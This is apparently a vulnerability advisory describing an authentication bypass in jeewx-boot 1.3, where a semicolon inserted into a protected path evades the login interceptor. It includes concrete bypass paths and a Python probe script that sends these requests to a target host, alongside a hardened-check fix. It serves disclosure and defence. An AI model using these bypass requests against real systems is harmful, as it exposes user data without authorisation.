jeewx-boot Authentication Bypass Vulnerability in Login Interceptor

Vulnerability

An authentication bypass vulnerability has been identified in jeewx-boot version 1.3. The issue lies in the LoginInterceptor class, specifically in its preHandle method, which decides whether a request must carry a valid authentication token. Because that decision depends on how the interceptor processes the request path, an attacker can craft a path that still reaches a protected API endpoint while the interceptor does not treat it as protected, so the endpoint can be reached without a valid token.

Impact

Exploitation of this vulnerability allows unauthorized access to protected API endpoints, potentially leading to unauthorized data access or manipulation.

Reproduction

To reproduce this vulnerability, send an unauthenticated GET request (no token, no session cookie) to the '/system/back/jwSystemUser/list.do' endpoint. The server redirects the request to the login page. If a semicolon is then inserted into the request path, the authentication check is bypassed and the endpoint returns user information without a token. The usual reason such a trick works is that servlet containers such as Tomcat and Spring MVC's handler mapping treat ';...' in a path segment as a path (matrix) parameter and strip it before routing, so the request still reaches the same controller method while a comparison performed on the raw request URI no longer matches; the advisory does not publish the interceptor's code, so the exact comparison being defeated is not confirmed here.
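The following Python script is an added example and is not code from jeewx-boot or from this advisory. It models the reproduction offline: a flawed check that compares the raw request URI (an assumed model of the bug, not the project's actual code) beside a hardened check that normalizes the path the way the servlet container and Spring's handler mapping do before comparing, and a small http.client probe that sends the baseline and semicolon variants to a host you are authorised to test. The protected prefix '/system/back/', the placement of the semicolon in the variants, and the helper names are assumptions; the endpoint path is the one named above.

```python
import http.client
import urllib.parse

# Endpoint named in the advisory. The prefix is an assumption about which URL
# space the interceptor protects; the advisory does not list it.
PROTECTED_PATH = "/system/back/jwSystemUser/list.do"
PROTECTED_PREFIX = "/system/back/"

# Constructed request paths: the baseline plus two variants with a matrix
# parameter (";x") inserted into an earlier segment. Tomcat and Spring MVC's
# handler mapping strip ";..." from each segment before routing, so all three
# reach the same controller method.
BASELINE = PROTECTED_PATH
BYPASS_VARIANTS = [
    "/system;x/back/jwSystemUser/list.do",
    "/system/back;x/jwSystemUser/list.do",
]


def normalize_lookup_path(raw_uri: str) -> str:
    """Approximate the lookup path the dispatcher routes on: drop the query
    string, strip ';...' from every segment, percent-decode, and resolve
    '.' and '..' segments."""
    path = raw_uri.split("?", 1)[0]
    segments = []
    for seg in path.split("/"):
        seg = urllib.parse.unquote(seg.split(";", 1)[0])
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


def naive_requires_login(raw_uri: str) -> bool:
    """Assumed model of the flawed check (not jeewx-boot's code): the decision
    is taken on the raw request URI, so a ';' in an early segment breaks the
    prefix match and the request is waved through."""
    return raw_uri.startswith(PROTECTED_PREFIX)


def hardened_requires_login(raw_uri: str) -> bool:
    """Same decision taken on the normalized lookup path, i.e. what the
    controller mapping sees, so ';' tricks no longer change the outcome."""
    return normalize_lookup_path(raw_uri).startswith(PROTECTED_PREFIX)


def evading_variants(requires_login) -> list:
    """Variants that route to the protected handler but for which the given
    check says no login is required."""
    return [
        v for v in BYPASS_VARIANTS
        if normalize_lookup_path(v) == PROTECTED_PATH and not requires_login(v)
    ]


def classify(baseline_status: int, variant_status: int) -> str:
    """Interpret a probe pair: the baseline should be redirected to the login
    page (3xx); a variant answered with 200 indicates the bypass."""
    if 300 <= baseline_status < 400 and variant_status == 200:
        return "bypass"
    if 300 <= baseline_status < 400 and 300 <= variant_status < 400:
        return "enforced"
    return "inconclusive"


def probe_status(host: str, port: int, path: str, use_tls: bool = False,
                 timeout: float = 5.0) -> int:
    """Send one unauthenticated GET (no cookies, no token) and return the raw
    status code. http.client does not follow redirects, so the login-page
    302 is observed as-is."""
    conn_cls = http.client.HTTPSConnection if use_tls else http.client.HTTPConnection
    conn = conn_cls(host, port, timeout=timeout)
    try:
        conn.request("GET", path)
        return conn.getresponse().status
    finally:
        conn.close()


def run_probe(host: str, port: int, use_tls: bool = False) -> dict:
    """Probe the baseline and every variant; returns {path: verdict}."""
    base = probe_status(host, port, BASELINE, use_tls)
    return {v: classify(base, probe_status(host, port, v, use_tls))
            for v in BYPASS_VARIANTS}


if __name__ == "__main__":
    # Offline demonstration of the path-handling difference; run_probe() is
    # only called against a host you are authorised to test.
    for variant in BYPASS_VARIANTS:
        print(variant, "->", normalize_lookup_path(variant),
              "| naive:", naive_requires_login(variant),
              "| hardened:", hardened_requires_login(variant))
    print("evading naive check:", evading_variants(naive_requires_login))
    print("evading hardened check:", evading_variants(hardened_requires_login))
```

The practical check this encodes: an interceptor must decide on the same path the handler mapping routes on, not on the raw request URI; in Spring that means registering the interceptor through the framework's path patterns or normalizing with the same rules before comparing.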

Added: Aug 20, 2025, 5:38 PM
Updated: Aug 20, 2025, 5:38 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 5.0
exploitability: 8.7
remediation: 0.0
relevance: 0.4
threat: 6.4
urgency: 2.9
incentive: 5.8

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.